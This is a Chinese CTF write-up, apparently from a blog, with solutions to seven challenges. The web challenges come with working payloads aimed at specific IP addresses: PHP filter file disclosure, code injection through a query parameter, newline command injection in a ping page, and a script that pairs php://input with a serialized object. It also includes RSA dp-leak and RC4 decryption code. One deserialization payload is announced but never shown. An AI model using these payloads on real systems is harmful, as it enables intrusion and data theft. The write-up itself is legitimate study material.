1.nani
构造payload,拿到user.php源码:http://120.55.43.255:24719/?file=php://filter/read=convert.base64-encode/resource=./user.php
<?php
class convent{
var $warn = "No hacker.";
function __destruct(){
eval($this->warn);
}
function __wakeup(){
foreach(get_object_vars($this) as $k => $v) {
$this->$k = null;
}
}
}
$cmd = $_POST[cmd];
unserialize($cmd);
?>
很明显,是一个反序列化的题,于是构造payload为:
flag就在txt文件中。
2.XImg
用Stegsolve.jar打开图片,lsb查看可以拿到flag:
3.random
构造payload:http://120.55.43.255:27189/?seed=1555236291&key=895547922&hello=);print_r(file(%22./flag.php%22));//
可拿到flag。
4.rsa
import gmpy2
e=65537
n=444511907374811621333864968430251419855347882081695888904531795366857517417289716213363408137550866409163408633679685635315881237914815762134949770798439327373469286675370381115822381092997433491238495970527484356127131132345893007368069814286822931047915482947544230741924674880304607902413527794657556174021361113759962742306966643629644800759209829893438222447478882663573891473386520138017997195362559918730232709719486847337248425121547893862458228964360472119045154255446606447184782930767120924229261090464514045697735201016333117579385787597262783543886217220299959364476125167328883418109849139384318692440116746717156025869399990008034002881758452936213924306428955442475834311604905905260723607788504332389824348292286402781474054375184928462870240017012586229806658850881803134678565293180207556731290044948846308165695896369703720482941116135445836684836990286418102640883844706122407701782360072256987197118468391662366105964629786899281484884877640733549203394680006068637251717623691598753570260479050407069262236583726905151495550801274277155039839844872050380772537409714164680083539118124646217833871816488578092001365486400242215564766336041803413006183310354910820598373905617564797817421231716827155927723376783
dp=20688083194401098183398626094352469308150523583583104270723199988926694776131531953207031668652408481119466919329893607763657623952024909876740067584191851505244658377465365020503008072292716279306615911408934182303357474341329766407852983275790499225322862499664901633190925232802162977135254216707834894816730529759991634343322039528413883937752397011466779521590767711786777317159161700645318091278528395252576086979838790917201179739657819356771788743301669430631157222234922010934163688512789947321007479617996170289230676037655762865962020063056831019134814970048718940037920888121806608032574204482673114726401
c=378245912689862819668716257795108255336928883693984263805908702337591160408234974716356292413190786704878880742998101926728409825216339197208512929079484687018187263522243781958701468849915372674337274640196043362477406890622345686503512151501592397926764442945655423801602100185867239106836704835215686246083812117439685990637352246191517010645343417283169123105697782747026231044064639955374854873089604766677942725374108213749982052985866259433900255218180285975477045323647923881322428349632056484406017564586481848442834247385904402824072352354677823823078646874632195128328299942128116508251564811923564362991466660005438580449558184197006623490303413636461137434703925564785299335803341222051570131842042120923719184091689629809380828306649702440460761848154682611972768099340896995546188526274235118488618951865589050087434162728116205149188555273127955536588551565951618535230908129965250151258048934985977493740897420718340268536363763127676899114219828753570040978640121185354431884041597851910784347040946251752577201426797684912671641470307249794269755972278013107831885544781029384256069586713714201822683071958299038410102821213570933652719191413490563464823296852894960994148922867149263897530215474500564443133161527
for x in range(1,e):
if (dp*e-1)%x == 0:
p = (dp*e-1)/x + 1
if n%p==0:
q = n / p
phi =(p - 1) * (q - 1)
d = int(gmpy2.invert(e,phi))
m = pow(c,d,n)
s = str(hex(m))[2:]
s = s[0:len(s)-1]
flag = s.decode('hex')
print flag
break
执行上述python代码可拿到flag。
5.admin
构造payload:
import requests
r = requests.post('http://120.55.43.255:28119/?user=php://input&file=class.php&pass=O:4:"Read":1:{s:4:"file";s:57:"php://filter/convert.base64-encode/resource=fffffflag.php";}',data='admin').content
print r
拿到一串base64,解码可得flag。
6.ping
构造payload:http://120.55.43.255:21173/ping.php?ip=127.0.0.1%0Als
flag就在txt文件中。
7.apk123
反编译apk,可知是RC4加密算法,用java代码编写RC4算法,解密可得flag.
import java.io.UnsupportedEncodingException;
public class RC4Util {
/**
* RC4加密,将加密后的数据进行哈希
* @param data 需要加密的数据
* @param key 加密密钥
* @param chartSet 编码方式
* @return 返回加密后的数据
* @throws UnsupportedEncodingException
*/
public static String encryRC4String(String data, String key, String chartSet) throws UnsupportedEncodingException {
if (data == null || key == null) {
return null;
}
return bytesToHex(encryRC4Byte(data, key, chartSet));
}
/**
* RC4加密,将加密后的字节数据
* @param data 需要加密的数据
* @param key 加密密钥
* @param chartSet 编码方式
* @return 返回加密后的数据
* @throws UnsupportedEncodingException
*/
public static byte[] encryRC4Byte(String data, String key, String chartSet) throws UnsupportedEncodingException {
if (data == null || key == null) {
return null;
}
if (chartSet == null || chartSet.isEmpty()) {
byte bData[] = data.getBytes();
return RC4Base(bData, key);
} else {
byte bData[] = data.getBytes(chartSet);
return RC4Base(bData, key);
}
}
/**
* RC4解密
* @param data 需要解密的数据
* @param key 加密密钥
* @param chartSet 编码方式
* @return 返回解密后的数据
* @throws UnsupportedEncodingException
*/
public static String decryRC4(String data, String key,String chartSet) throws UnsupportedEncodingException {
if (data == null || key == null) {
return null;
}
return new String(RC4Base(hexToByte(data), key),chartSet);
}
/**
* RC4加密初始化密钥
* @param aKey
* @return
*/
private static byte[] initKey(String aKey) {
byte[] bkey = aKey.getBytes();
byte state[] = new byte[256];
for (int i = 0; i < 256; i++) {
state[i] = (byte) i;
}
int index1 = 0;
int index2 = 0;
if (bkey.length == 0) {
return null;
}
for (int i = 0; i < 256; i++) {
index2 = ((bkey[index1] & 0xff) + (state[i] & 0xff) + index2) & 0xff;
byte tmp = state[i];
state[i] = state[index2];
state[index2] = tmp;
index1 = (index1 + 1) % bkey.length;
}
return state;
}
/**
* 字节数组转十六进制
* @param bytes
* @return
*/
public static String bytesToHex(byte[] bytes) {
StringBuffer sb = new StringBuffer();
for(int i = 0; i < bytes.length; i++) {
String hex = Integer.toHexString(bytes[i] & 0xFF);
if(hex.length() < 2){
sb.append(0);
}
sb.append(hex);
}
return sb.toString();
}
/**
* 十六进制转字节数组
* @param src
* @return
*/
public static byte[] hexToByte(String inHex){
int hexlen = inHex.length();
byte[] result;
if (hexlen % 2 == 1){
hexlen++;
result = new byte[(hexlen/2)];
inHex="0"+inHex;
}else {
result = new byte[(hexlen/2)];
}
int j=0;
for (int i = 0; i < hexlen; i+=2){
result[j]=(byte)Integer.parseInt(inHex.substring(i,i+2),16);
j++;
}
return result;
}
/**
* RC4解密
* @param input
* @param mKkey
* @return
*/
private static byte[] RC4Base(byte[] input, String mKkey) {
int x = 0;
int y = 0;
byte key[] = initKey(mKkey);
int xorIndex;
byte[] result = new byte[input.length];
for (int i = 0; i < input.length; i++) {
x = (x + 1) & 0xff;
y = ((key[x] & 0xff) + y) & 0xff;
byte tmp = key[x];
key[x] = key[y];
key[y] = tmp;
xorIndex = ((key[x] & 0xff) + (key[y] & 0xff)) & 0xff;
result[i] = (byte) (input[i] ^ key[xorIndex]);
}
return result;
}
public static void main(String[] args) throws Exception{
System.out.println(decryRC4("52aedea36a3c058b38aa32e625889947db302a6d1defdabf413085abf611487bf445e85108327a867c27","Flag{This_Not_Flag}","UTF-8"));
}
}
博客专家
原创文章 108
获赞 219
访问量 42万+